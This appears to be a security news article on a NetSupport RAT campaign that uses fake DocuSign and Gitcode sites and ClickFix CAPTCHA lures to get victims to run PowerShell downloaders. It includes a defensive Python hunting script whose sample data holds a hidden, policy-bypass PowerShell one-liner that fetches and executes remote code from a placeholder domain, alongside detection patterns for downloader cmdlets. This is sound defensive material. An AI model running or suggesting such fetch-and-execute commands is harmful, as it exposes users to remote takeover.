
Multi-Stage PowerShell Attack Spreads NetSupport RAT
July 21, 2025
Topics
- rat
- powershell
- trojan
- malware
Threat hunters have discovered a new campaign that uses fake DocuSign and Gitcode websites to trick users into running malicious PowerShell scripts, ultimately infecting their systems with the NetSupport RAT. According to DomainTools, these sites lure users into copying and executing a multi-stage PowerShell downloader that installs the malware and gives the attacker remote access to the system.
NetSupport RAT is a stealthy piece of malware that hackers use to remotely take control of someone’s computer without their knowledge. It started as a legitimate remote access tool for IT support, but attackers have twisted it into something harmful. Hackers usually trick people into installing it through fake websites, phishing emails, or even fake software updates, sometimes asking victims to run PowerShell commands themselves. Once it’s on the system, the hacker can see your screen, move your mouse, steal files, and run commands as if they were sitting right at your computer. It has been used in all kinds of scams, including fake DocuSign pages and Pokémon game downloads.
Several well-known hacker groups frequently employ Remote Access Trojans, or RATs, to infiltrate systems and remain undetected while stealing data or executing other malicious activities. FIN7 is one of the most active, using RATs to target businesses and steal credit card info, especially in the retail and hospitality sectors. APT33, which is believed to be linked to Iran, has used RATs to spy on companies in the energy and aerospace industries. APT41, tied to China, uses RATs for both spying and financial gain, often staying in networks for long periods. Another group, TA505, is known for spreading RATs like FlawedAmmyy to move around inside corporate systems. These groups rely on RATs not just to get in, but to control devices remotely and quietly carry out their goals over time.
A new malware campaign is using fake websites that look like Gitcode and DocuSign to trick users into running malicious PowerShell scripts, ultimately infecting their systems with NetSupport RAT. According to DomainTools, these sites lure victims, often through phishing emails or social media, into copying and running a PowerShell command in their Windows Run dialog. This command starts a chain reaction, downloading multiple scripts one after another until NetSupport RAT is installed. Some fake DocuSign sites even use a trick called ClickFix, where a CAPTCHA test fools users into copying a hidden command to their clipboard. When users paste and run it, thinking it's part of a verification step, the attack is triggered.
The attack uses multiple layers of scripts to avoid detection and make investigation more difficult. One stage downloads a persistence file from GitHub so the malware runs every time the system starts. While that file was unavailable at the time of analysis, researchers confirmed that the scripts communicate with fake DocuSign domains to retrieve and execute additional stages. The campaign shares similarities with past attacks like SocGholish, using familiar domain patterns and delivery methods. Although NetSupport Manager is a legitimate remote access tool, it has been misused to take full control of compromised machines by threat groups such as FIN7, a financially motivated cybercriminal group known for targeting businesses with sophisticated phishing campaigns and malware to steal payment card data and gain remote access to networks, and Storm-0408, a threat group linked to malware distribution campaigns that use fake websites and social engineering tactics to deliver remote access tools like NetSupport RAT.
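As an added illustration of how a defender could hunt for the paste-into-Run behaviour described above (example code written for this article, not code from DomainTools or the original report), the script below scans constructed Sysmon-style process-creation events for a script host spawned by the Explorer shell whose command line carries hidden-window, policy-bypass, download or remote-URL markers. The event fields, domains and command lines are constructed assumptions, not indicators from the campaign.

```python
import re
from pathlib import PureWindowsPath

# Constructed sample process-creation events (Sysmon Event ID 1 style fields), not campaign telemetry.
SAMPLE_EVENTS = [
    {   # pasted one-liner launched from the Run dialog (child of the Explorer shell)
        "ParentImage": r"C:\Windows\explorer.exe",
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "CommandLine": r'powershell -w hidden -ep bypass -c "iex (iwr http://docusign.invalid/verify -UseBasicParsing).Content"',
    },
    {   # benign interactive PowerShell use from the shell
        "ParentImage": r"C:\Windows\explorer.exe",
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "CommandLine": "powershell Get-Process",
    },
    {   # download cmdlet, but the parent is a build tool, not the shell
        "ParentImage": r"C:\Program Files\Git\cmd\git.exe",
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "CommandLine": "powershell -c Invoke-WebRequest https://internal.invalid/hook.ps1",
    },
]

SHELL_PARENTS = {"explorer.exe"}  # Run dialog launches are children of Explorer
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe", "mshta.exe", "cmd.exe", "wscript.exe"}

# Indicator name -> case-insensitive pattern over the command line.
INDICATORS = {
    "hidden-window": re.compile(r"-w(?:indowstyle)?\s+hidden", re.I),
    "encoded-command": re.compile(r"-e(?:c|nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{20,}", re.I),
    "policy-bypass": re.compile(r"-(?:ep|executionpolicy)\s+bypass|-nop(?:rofile)?\b", re.I),
    "invoke-expression": re.compile(r"\biex\b|invoke-expression", re.I),
    "downloader": re.compile(r"\biwr\b|invoke-webrequest|downloadstring|downloadfile|net\.webclient|\bcurl\b", re.I),
    "remote-url": re.compile(r"https?://", re.I),
}

def basename(path):
    return PureWindowsPath(path).name.lower()

def match_indicators(command_line):
    # Names of every indicator present in the command line, in INDICATORS order.
    return [name for name, rx in INDICATORS.items() if rx.search(command_line)]

def is_clickfix_like(event):
    # Shell-spawned script host whose command line carries at least one indicator.
    return (basename(event["ParentImage"]) in SHELL_PARENTS
            and basename(event["Image"]) in SCRIPT_HOSTS
            and bool(match_indicators(event["CommandLine"])))

def hunt(events):
    # (index, indicators) for every event that looks like a pasted ClickFix launch.
    return [(i, match_indicators(e["CommandLine"])) for i, e in enumerate(events) if is_clickfix_like(e)]
```

The parent-process condition is what separates a pasted Run-dialog launch from the same cmdlets invoked by build tools or scheduled tasks, so tune SHELL_PARENTS and SCRIPT_HOSTS to the hosts your environment actually allows.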
To protect yourself from attacks like the one using NetSupport RAT, it's strongly recommended that you avoid copying and running any scripts from websites, emails, or messages unless you're completely sure they're safe. Be extra cautious with websites that look like trusted services, such as DocuSign or GitHub, and always double-check the URL for anything suspicious. Limit or disable PowerShell access if you don’t need it, especially for non-admin users. Make sure your antivirus is up to date and offers real-time protection, and always keep your system and software fully updated. Avoid sites that ask you to complete a CAPTCHA and then instruct you to paste commands into the Run box; this is often a trap. Use a secure browser with phishing protection features and take time to learn how to spot common tricks used in social engineering attacks.
This campaign is a clear example of how attackers are using realistic-looking websites and social engineering tricks to get people to unknowingly install dangerous malware like NetSupport RAT. By disguising harmful scripts behind fake CAPTCHAs and multi-stage downloads, they make it easy for someone to fall for the trap without realizing what's happening. It shows why it’s so important to be careful about what you click on or run, especially from unfamiliar sources. Taking simple precautions like keeping your antivirus updated, checking website URLs, and avoiding suspicious scripts can make a big difference in staying safe online.